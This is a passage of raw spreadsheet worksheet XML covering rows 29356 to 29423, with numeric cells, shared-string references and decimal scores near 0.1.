        <v>1.0</v>
      </c>
      <c r="E29356" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29356" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29357" ht="15.75" customHeight="1">
      <c r="A29357" s="1">
        <v>25893.0</v>
      </c>
      <c r="B29357" s="2">
        <v>1.498375E7</v>
      </c>
      <c r="C29357" s="2" t="s">
        <v>28224</v>
      </c>
      <c r="D29357" s="2">
        <v>1.0</v>
      </c>
      <c r="E29357" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29357" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29358" ht="15.75" customHeight="1">
      <c r="A29358" s="1">
        <v>26436.0</v>
      </c>
      <c r="B29358" s="2">
        <v>1.7243562E7</v>
      </c>
      <c r="C29358" s="2" t="s">
        <v>28225</v>
      </c>
      <c r="D29358" s="2">
        <v>1.0</v>
      </c>
      <c r="E29358" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29358" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29359" ht="15.75" customHeight="1">
      <c r="A29359" s="1">
        <v>26799.0</v>
      </c>
      <c r="B29359" s="2">
        <v>1.864205E7</v>
      </c>
      <c r="C29359" s="2" t="s">
        <v>28226</v>
      </c>
      <c r="D29359" s="2">
        <v>1.0</v>
      </c>
      <c r="E29359" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29359" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29360" ht="15.75" customHeight="1">
      <c r="A29360" s="1">
        <v>27449.0</v>
      </c>
      <c r="B29360" s="2">
        <v>2.1985098E7</v>
      </c>
      <c r="C29360" s="2" t="s">
        <v>28220</v>
      </c>
      <c r="D29360" s="2">
        <v>1.0</v>
      </c>
      <c r="E29360" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29360" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29361" ht="15.75" customHeight="1">
      <c r="A29361" s="1">
        <v>27552.0</v>
      </c>
      <c r="B29361" s="2">
        <v>2.2347655E7</v>
      </c>
      <c r="C29361" s="2" t="s">
        <v>28227</v>
      </c>
      <c r="D29361" s="2">
        <v>1.0</v>
      </c>
      <c r="E29361" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29361" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29362" ht="15.75" customHeight="1">
      <c r="A29362" s="1">
        <v>27726.0</v>
      </c>
      <c r="B29362" s="2">
        <v>2.3063025E7</v>
      </c>
      <c r="C29362" s="2" t="s">
        <v>28228</v>
      </c>
      <c r="D29362" s="2">
        <v>1.0</v>
      </c>
      <c r="E29362" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29362" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29363" ht="15.75" customHeight="1">
      <c r="A29363" s="1">
        <v>27800.0</v>
      </c>
      <c r="B29363" s="2">
        <v>2.3185336E7</v>
      </c>
      <c r="C29363" s="2" t="s">
        <v>28229</v>
      </c>
      <c r="D29363" s="2">
        <v>1.0</v>
      </c>
      <c r="E29363" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29363" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29364" ht="15.75" customHeight="1">
      <c r="A29364" s="1">
        <v>27835.0</v>
      </c>
      <c r="B29364" s="2">
        <v>2.3406625E7</v>
      </c>
      <c r="C29364" s="2" t="s">
        <v>28230</v>
      </c>
      <c r="D29364" s="2">
        <v>1.0</v>
      </c>
      <c r="E29364" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29364" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29365" ht="15.75" customHeight="1">
      <c r="A29365" s="1">
        <v>28076.0</v>
      </c>
      <c r="B29365" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C29365" s="2" t="s">
        <v>28231</v>
      </c>
      <c r="D29365" s="2">
        <v>1.0</v>
      </c>
      <c r="E29365" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29365" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29366" ht="15.75" customHeight="1">
      <c r="A29366" s="1">
        <v>28690.0</v>
      </c>
      <c r="B29366" s="2">
        <v>2.763809E7</v>
      </c>
      <c r="C29366" s="2" t="s">
        <v>28232</v>
      </c>
      <c r="D29366" s="2">
        <v>1.0</v>
      </c>
      <c r="E29366" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29366" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29367" ht="15.75" customHeight="1">
      <c r="A29367" s="1">
        <v>29310.0</v>
      </c>
      <c r="B29367" s="2">
        <v>3.1274004E7</v>
      </c>
      <c r="C29367" s="2" t="s">
        <v>28233</v>
      </c>
      <c r="D29367" s="2">
        <v>1.0</v>
      </c>
      <c r="E29367" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29367" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29368" ht="15.75" customHeight="1">
      <c r="A29368" s="1">
        <v>29763.0</v>
      </c>
      <c r="B29368" s="2">
        <v>3.4815502E7</v>
      </c>
      <c r="C29368" s="2" t="s">
        <v>28234</v>
      </c>
      <c r="D29368" s="2">
        <v>1.0</v>
      </c>
      <c r="E29368" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29368" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29369" ht="15.75" customHeight="1">
      <c r="A29369" s="1">
        <v>31302.0</v>
      </c>
      <c r="B29369" s="2">
        <v>4967863.0</v>
      </c>
      <c r="C29369" s="2" t="s">
        <v>28235</v>
      </c>
      <c r="D29369" s="2">
        <v>1.0</v>
      </c>
      <c r="E29369" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29369" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29370" ht="15.75" customHeight="1">
      <c r="A29370" s="1">
        <v>32409.0</v>
      </c>
      <c r="B29370" s="2">
        <v>5637854.0</v>
      </c>
      <c r="C29370" s="2" t="s">
        <v>28236</v>
      </c>
      <c r="D29370" s="2">
        <v>1.0</v>
      </c>
      <c r="E29370" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29370" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29371" ht="15.75" customHeight="1">
      <c r="A29371" s="1">
        <v>32512.0</v>
      </c>
      <c r="B29371" s="2">
        <v>5716250.0</v>
      </c>
      <c r="C29371" s="2" t="s">
        <v>28237</v>
      </c>
      <c r="D29371" s="2">
        <v>1.0</v>
      </c>
      <c r="E29371" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29371" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29372" ht="15.75" customHeight="1">
      <c r="A29372" s="1">
        <v>32881.0</v>
      </c>
      <c r="B29372" s="2">
        <v>6341647.0</v>
      </c>
      <c r="C29372" s="2" t="s">
        <v>28238</v>
      </c>
      <c r="D29372" s="2">
        <v>1.0</v>
      </c>
      <c r="E29372" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29372" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29373" ht="15.75" customHeight="1">
      <c r="A29373" s="1">
        <v>33738.0</v>
      </c>
      <c r="B29373" s="2">
        <v>8549400.0</v>
      </c>
      <c r="C29373" s="5" t="s">
        <v>28239</v>
      </c>
      <c r="D29373" s="2">
        <v>1.0</v>
      </c>
      <c r="E29373" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29373" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29374" ht="15.75" customHeight="1">
      <c r="A29374" s="1">
        <v>21684.0</v>
      </c>
      <c r="B29374" s="2">
        <v>2.5078536E7</v>
      </c>
      <c r="C29374" s="2" t="s">
        <v>18076</v>
      </c>
      <c r="D29374" s="2">
        <v>1.0</v>
      </c>
      <c r="E29374" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29374" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="29375" ht="15.75" customHeight="1">
      <c r="A29375" s="1">
        <v>29805.0</v>
      </c>
      <c r="B29375" s="2">
        <v>3.5151091E7</v>
      </c>
      <c r="C29375" s="2" t="s">
        <v>28240</v>
      </c>
      <c r="D29375" s="2">
        <v>1.0</v>
      </c>
      <c r="E29375" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29375" s="2">
        <v>0.1009259259259259</v>
      </c>
    </row>
    <row r="29376" ht="15.75" customHeight="1">
      <c r="A29376" s="1">
        <v>559.0</v>
      </c>
      <c r="B29376" s="2">
        <v>1.8921299E7</v>
      </c>
      <c r="C29376" s="2" t="s">
        <v>28241</v>
      </c>
      <c r="D29376" s="2">
        <v>1.0</v>
      </c>
      <c r="E29376" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29376" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="29377" ht="15.75" customHeight="1">
      <c r="A29377" s="1">
        <v>3699.0</v>
      </c>
      <c r="B29377" s="2">
        <v>3.9545452E7</v>
      </c>
      <c r="C29377" s="2" t="s">
        <v>28242</v>
      </c>
      <c r="D29377" s="2">
        <v>1.0</v>
      </c>
      <c r="E29377" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29377" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="29378" ht="15.75" customHeight="1">
      <c r="A29378" s="1">
        <v>8565.0</v>
      </c>
      <c r="B29378" s="2">
        <v>5.4176463E7</v>
      </c>
      <c r="C29378" s="2" t="s">
        <v>28243</v>
      </c>
      <c r="D29378" s="2">
        <v>1.0</v>
      </c>
      <c r="E29378" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29378" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="29379" ht="15.75" customHeight="1">
      <c r="A29379" s="1">
        <v>12737.0</v>
      </c>
      <c r="B29379" s="2">
        <v>3.1050828E7</v>
      </c>
      <c r="C29379" s="2" t="s">
        <v>28244</v>
      </c>
      <c r="D29379" s="2">
        <v>1.0</v>
      </c>
      <c r="E29379" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29379" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="29380" ht="15.75" customHeight="1">
      <c r="A29380" s="1">
        <v>14751.0</v>
      </c>
      <c r="B29380" s="2">
        <v>4.0761176E7</v>
      </c>
      <c r="C29380" s="2" t="s">
        <v>28245</v>
      </c>
      <c r="D29380" s="2">
        <v>1.0</v>
      </c>
      <c r="E29380" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29380" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="29381" ht="15.75" customHeight="1">
      <c r="A29381" s="1">
        <v>18331.0</v>
      </c>
      <c r="B29381" s="2">
        <v>5.2412235E7</v>
      </c>
      <c r="C29381" s="2" t="s">
        <v>28246</v>
      </c>
      <c r="D29381" s="2">
        <v>1.0</v>
      </c>
      <c r="E29381" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29381" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="29382" ht="15.75" customHeight="1">
      <c r="A29382" s="1">
        <v>18814.0</v>
      </c>
      <c r="B29382" s="2">
        <v>5.3917484E7</v>
      </c>
      <c r="C29382" s="2" t="s">
        <v>28247</v>
      </c>
      <c r="D29382" s="2">
        <v>1.0</v>
      </c>
      <c r="E29382" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29382" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="29383" ht="15.75" customHeight="1">
      <c r="A29383" s="1">
        <v>19129.0</v>
      </c>
      <c r="B29383" s="2">
        <v>5.47653E7</v>
      </c>
      <c r="C29383" s="2" t="s">
        <v>28248</v>
      </c>
      <c r="D29383" s="2">
        <v>1.0</v>
      </c>
      <c r="E29383" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29383" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="29384" ht="15.75" customHeight="1">
      <c r="A29384" s="1">
        <v>19499.0</v>
      </c>
      <c r="B29384" s="2">
        <v>5.5906463E7</v>
      </c>
      <c r="C29384" s="2" t="s">
        <v>28249</v>
      </c>
      <c r="D29384" s="2">
        <v>1.0</v>
      </c>
      <c r="E29384" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29384" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="29385" ht="15.75" customHeight="1">
      <c r="A29385" s="1">
        <v>19862.0</v>
      </c>
      <c r="B29385" s="2">
        <v>5.7157418E7</v>
      </c>
      <c r="C29385" s="2" t="s">
        <v>28250</v>
      </c>
      <c r="D29385" s="2">
        <v>1.0</v>
      </c>
      <c r="E29385" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29385" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="29386" ht="15.75" customHeight="1">
      <c r="A29386" s="1">
        <v>21174.0</v>
      </c>
      <c r="B29386" s="2">
        <v>1.908599E7</v>
      </c>
      <c r="C29386" s="2" t="s">
        <v>28251</v>
      </c>
      <c r="D29386" s="2">
        <v>1.0</v>
      </c>
      <c r="E29386" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29386" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="29387" ht="15.75" customHeight="1">
      <c r="A29387" s="1">
        <v>26195.0</v>
      </c>
      <c r="B29387" s="2">
        <v>1.6231316E7</v>
      </c>
      <c r="C29387" s="2" t="s">
        <v>28252</v>
      </c>
      <c r="D29387" s="2">
        <v>1.0</v>
      </c>
      <c r="E29387" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29387" s="2">
        <v>0.09999999999999999</v>
      </c>
    </row>
    <row r="29388" ht="15.75" customHeight="1">
      <c r="A29388" s="1">
        <v>8934.0</v>
      </c>
      <c r="B29388" s="2">
        <v>5.4854205E7</v>
      </c>
      <c r="C29388" s="2" t="s">
        <v>28253</v>
      </c>
      <c r="D29388" s="2">
        <v>1.0</v>
      </c>
      <c r="E29388" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29388" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="29389" ht="15.75" customHeight="1">
      <c r="A29389" s="1">
        <v>8224.0</v>
      </c>
      <c r="B29389" s="2">
        <v>5.3336908E7</v>
      </c>
      <c r="C29389" s="2" t="s">
        <v>28254</v>
      </c>
      <c r="D29389" s="2">
        <v>1.0</v>
      </c>
      <c r="E29389" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29389" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="29390" ht="15.75" customHeight="1">
      <c r="A29390" s="1">
        <v>14303.0</v>
      </c>
      <c r="B29390" s="2">
        <v>3.859838E7</v>
      </c>
      <c r="C29390" s="2" t="s">
        <v>28255</v>
      </c>
      <c r="D29390" s="2">
        <v>1.0</v>
      </c>
      <c r="E29390" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29390" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="29391" ht="15.75" customHeight="1">
      <c r="A29391" s="1">
        <v>22504.0</v>
      </c>
      <c r="B29391" s="2">
        <v>3.7372657E7</v>
      </c>
      <c r="C29391" s="2" t="s">
        <v>28256</v>
      </c>
      <c r="D29391" s="2">
        <v>1.0</v>
      </c>
      <c r="E29391" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29391" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="29392" ht="15.75" customHeight="1">
      <c r="A29392" s="1">
        <v>32709.0</v>
      </c>
      <c r="B29392" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C29392" s="2" t="s">
        <v>28257</v>
      </c>
      <c r="D29392" s="2">
        <v>1.0</v>
      </c>
      <c r="E29392" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29392" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="29393" ht="15.75" customHeight="1">
      <c r="A29393" s="1">
        <v>11205.0</v>
      </c>
      <c r="B29393" s="2">
        <v>2.0058672E7</v>
      </c>
      <c r="C29393" s="2" t="s">
        <v>28258</v>
      </c>
      <c r="D29393" s="2">
        <v>1.0</v>
      </c>
      <c r="E29393" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29393" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="29394" ht="15.75" customHeight="1">
      <c r="A29394" s="1">
        <v>9044.0</v>
      </c>
      <c r="B29394" s="2">
        <v>5.5057299E7</v>
      </c>
      <c r="C29394" s="2" t="s">
        <v>28259</v>
      </c>
      <c r="D29394" s="2">
        <v>1.0</v>
      </c>
      <c r="E29394" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29394" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="29395" ht="15.75" customHeight="1">
      <c r="A29395" s="1">
        <v>9877.0</v>
      </c>
      <c r="B29395" s="2">
        <v>5.6745122E7</v>
      </c>
      <c r="C29395" s="2" t="s">
        <v>28260</v>
      </c>
      <c r="D29395" s="2">
        <v>1.0</v>
      </c>
      <c r="E29395" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29395" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="29396" ht="15.75" customHeight="1">
      <c r="A29396" s="1">
        <v>12929.0</v>
      </c>
      <c r="B29396" s="2">
        <v>3.2320733E7</v>
      </c>
      <c r="C29396" s="2" t="s">
        <v>28261</v>
      </c>
      <c r="D29396" s="2">
        <v>1.0</v>
      </c>
      <c r="E29396" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29396" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="29397" ht="15.75" customHeight="1">
      <c r="A29397" s="1">
        <v>15876.0</v>
      </c>
      <c r="B29397" s="2">
        <v>4.4504641E7</v>
      </c>
      <c r="C29397" s="2" t="s">
        <v>28262</v>
      </c>
      <c r="D29397" s="2">
        <v>1.0</v>
      </c>
      <c r="E29397" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29397" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="29398" ht="15.75" customHeight="1">
      <c r="A29398" s="1">
        <v>19245.0</v>
      </c>
      <c r="B29398" s="2">
        <v>5.510482E7</v>
      </c>
      <c r="C29398" s="2" t="s">
        <v>28263</v>
      </c>
      <c r="D29398" s="2">
        <v>1.0</v>
      </c>
      <c r="E29398" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29398" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="29399" ht="15.75" customHeight="1">
      <c r="A29399" s="1">
        <v>26318.0</v>
      </c>
      <c r="B29399" s="2">
        <v>1.6663825E7</v>
      </c>
      <c r="C29399" s="2" t="s">
        <v>28264</v>
      </c>
      <c r="D29399" s="2">
        <v>1.0</v>
      </c>
      <c r="E29399" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29399" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="29400" ht="15.75" customHeight="1">
      <c r="A29400" s="1">
        <v>27823.0</v>
      </c>
      <c r="B29400" s="2">
        <v>2.3389041E7</v>
      </c>
      <c r="C29400" s="2" t="s">
        <v>28265</v>
      </c>
      <c r="D29400" s="2">
        <v>1.0</v>
      </c>
      <c r="E29400" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29400" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="29401" ht="15.75" customHeight="1">
      <c r="A29401" s="1">
        <v>33882.0</v>
      </c>
      <c r="B29401" s="2">
        <v>9123514.0</v>
      </c>
      <c r="C29401" s="2" t="s">
        <v>28266</v>
      </c>
      <c r="D29401" s="2">
        <v>1.0</v>
      </c>
      <c r="E29401" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29401" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="29402" ht="15.75" customHeight="1">
      <c r="A29402" s="1">
        <v>29385.0</v>
      </c>
      <c r="B29402" s="2">
        <v>3.1848348E7</v>
      </c>
      <c r="C29402" s="2" t="s">
        <v>28267</v>
      </c>
      <c r="D29402" s="2">
        <v>1.0</v>
      </c>
      <c r="E29402" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29402" s="2">
        <v>0.09964726631393298</v>
      </c>
    </row>
    <row r="29403" ht="15.75" customHeight="1">
      <c r="A29403" s="1">
        <v>843.0</v>
      </c>
      <c r="B29403" s="2">
        <v>2.1650823E7</v>
      </c>
      <c r="C29403" s="2" t="s">
        <v>28268</v>
      </c>
      <c r="D29403" s="2">
        <v>1.0</v>
      </c>
      <c r="E29403" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29403" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29404" ht="15.75" customHeight="1">
      <c r="A29404" s="1">
        <v>10222.0</v>
      </c>
      <c r="B29404" s="2">
        <v>5.7459299E7</v>
      </c>
      <c r="C29404" s="2" t="s">
        <v>28269</v>
      </c>
      <c r="D29404" s="2">
        <v>1.0</v>
      </c>
      <c r="E29404" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29404" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29405" ht="15.75" customHeight="1">
      <c r="A29405" s="1">
        <v>11033.0</v>
      </c>
      <c r="B29405" s="2">
        <v>1.798182E7</v>
      </c>
      <c r="C29405" s="2" t="s">
        <v>28270</v>
      </c>
      <c r="D29405" s="2">
        <v>1.0</v>
      </c>
      <c r="E29405" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29405" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29406" ht="15.75" customHeight="1">
      <c r="A29406" s="1">
        <v>12604.0</v>
      </c>
      <c r="B29406" s="2">
        <v>3.0094704E7</v>
      </c>
      <c r="C29406" s="2" t="s">
        <v>28271</v>
      </c>
      <c r="D29406" s="2">
        <v>1.0</v>
      </c>
      <c r="E29406" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29406" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29407" ht="15.75" customHeight="1">
      <c r="A29407" s="1">
        <v>18020.0</v>
      </c>
      <c r="B29407" s="2">
        <v>5.1509661E7</v>
      </c>
      <c r="C29407" s="2" t="s">
        <v>28272</v>
      </c>
      <c r="D29407" s="2">
        <v>1.0</v>
      </c>
      <c r="E29407" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29407" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29408" ht="15.75" customHeight="1">
      <c r="A29408" s="1">
        <v>20320.0</v>
      </c>
      <c r="B29408" s="2">
        <v>1.1478668E7</v>
      </c>
      <c r="C29408" s="2" t="s">
        <v>28273</v>
      </c>
      <c r="D29408" s="2">
        <v>1.0</v>
      </c>
      <c r="E29408" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29408" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29409" ht="15.75" customHeight="1">
      <c r="A29409" s="1">
        <v>23986.0</v>
      </c>
      <c r="B29409" s="2">
        <v>9131109.0</v>
      </c>
      <c r="C29409" s="2" t="s">
        <v>10358</v>
      </c>
      <c r="D29409" s="2">
        <v>1.0</v>
      </c>
      <c r="E29409" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29409" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29410" ht="15.75" customHeight="1">
      <c r="A29410" s="1">
        <v>25549.0</v>
      </c>
      <c r="B29410" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C29410" s="2" t="s">
        <v>28274</v>
      </c>
      <c r="D29410" s="2">
        <v>1.0</v>
      </c>
      <c r="E29410" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29410" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29411" ht="15.75" customHeight="1">
      <c r="A29411" s="1">
        <v>25999.0</v>
      </c>
      <c r="B29411" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C29411" s="2" t="s">
        <v>28275</v>
      </c>
      <c r="D29411" s="2">
        <v>1.0</v>
      </c>
      <c r="E29411" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29411" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29412" ht="15.75" customHeight="1">
      <c r="A29412" s="1">
        <v>26279.0</v>
      </c>
      <c r="B29412" s="2">
        <v>1.6424607E7</v>
      </c>
      <c r="C29412" s="2" t="s">
        <v>28276</v>
      </c>
      <c r="D29412" s="2">
        <v>1.0</v>
      </c>
      <c r="E29412" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29412" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="29413" ht="15.75" customHeight="1">
      <c r="A29413" s="1">
        <v>1075.0</v>
      </c>
      <c r="B29413" s="2">
        <v>2.3591535E7</v>
      </c>
      <c r="C29413" s="2" t="s">
        <v>28277</v>
      </c>
      <c r="D29413" s="2">
        <v>1.0</v>
      </c>
      <c r="E29413" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29413" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29414" ht="15.75" customHeight="1">
      <c r="A29414" s="1">
        <v>2016.0</v>
      </c>
      <c r="B29414" s="2">
        <v>3.0733563E7</v>
      </c>
      <c r="C29414" s="2" t="s">
        <v>28278</v>
      </c>
      <c r="D29414" s="2">
        <v>1.0</v>
      </c>
      <c r="E29414" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29414" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29415" ht="15.75" customHeight="1">
      <c r="A29415" s="1">
        <v>2049.0</v>
      </c>
      <c r="B29415" s="2">
        <v>3.0938991E7</v>
      </c>
      <c r="C29415" s="2" t="s">
        <v>28279</v>
      </c>
      <c r="D29415" s="2">
        <v>1.0</v>
      </c>
      <c r="E29415" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29415" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29416" ht="15.75" customHeight="1">
      <c r="A29416" s="1">
        <v>2601.0</v>
      </c>
      <c r="B29416" s="2">
        <v>3.4385625E7</v>
      </c>
      <c r="C29416" s="2" t="s">
        <v>28280</v>
      </c>
      <c r="D29416" s="2">
        <v>1.0</v>
      </c>
      <c r="E29416" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29416" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29417" ht="15.75" customHeight="1">
      <c r="A29417" s="1">
        <v>4811.0</v>
      </c>
      <c r="B29417" s="2">
        <v>4.3561831E7</v>
      </c>
      <c r="C29417" s="2" t="s">
        <v>28281</v>
      </c>
      <c r="D29417" s="2">
        <v>1.0</v>
      </c>
      <c r="E29417" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29417" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29418" ht="15.75" customHeight="1">
      <c r="A29418" s="1">
        <v>5393.0</v>
      </c>
      <c r="B29418" s="2">
        <v>4.5459857E7</v>
      </c>
      <c r="C29418" s="2" t="s">
        <v>28282</v>
      </c>
      <c r="D29418" s="2">
        <v>1.0</v>
      </c>
      <c r="E29418" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29418" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29419" ht="15.75" customHeight="1">
      <c r="A29419" s="1">
        <v>5851.0</v>
      </c>
      <c r="B29419" s="2">
        <v>4.6935345E7</v>
      </c>
      <c r="C29419" s="2" t="s">
        <v>28283</v>
      </c>
      <c r="D29419" s="2">
        <v>1.0</v>
      </c>
      <c r="E29419" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29419" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29420" ht="15.75" customHeight="1">
      <c r="A29420" s="1">
        <v>5878.0</v>
      </c>
      <c r="B29420" s="2">
        <v>4.707094E7</v>
      </c>
      <c r="C29420" s="2" t="s">
        <v>28284</v>
      </c>
      <c r="D29420" s="2">
        <v>1.0</v>
      </c>
      <c r="E29420" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29420" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29421" ht="15.75" customHeight="1">
      <c r="A29421" s="1">
        <v>6295.0</v>
      </c>
      <c r="B29421" s="2">
        <v>4.8211548E7</v>
      </c>
      <c r="C29421" s="2" t="s">
        <v>28285</v>
      </c>
      <c r="D29421" s="2">
        <v>1.0</v>
      </c>
      <c r="E29421" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29421" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29422" ht="15.75" customHeight="1">
      <c r="A29422" s="1">
        <v>6407.0</v>
      </c>
      <c r="B29422" s="2">
        <v>4.8501747E7</v>
      </c>
      <c r="C29422" s="2" t="s">
        <v>28286</v>
      </c>
      <c r="D29422" s="2">
        <v>1.0</v>
      </c>
      <c r="E29422" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29422" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="29423" ht="15.75" customHeight="1">
      <c r="A29423" s="1">
        <v>7267.0</v>
      </c>
      <c r="B29423" s="2">
        <v>5.0770703E7</v>
      </c>
      <c r="C29423" s="2" t="s">
        <v>28287</v>
      </c>
      <c r="D29423" s="2">
        <v>1.0</v>
      </c>
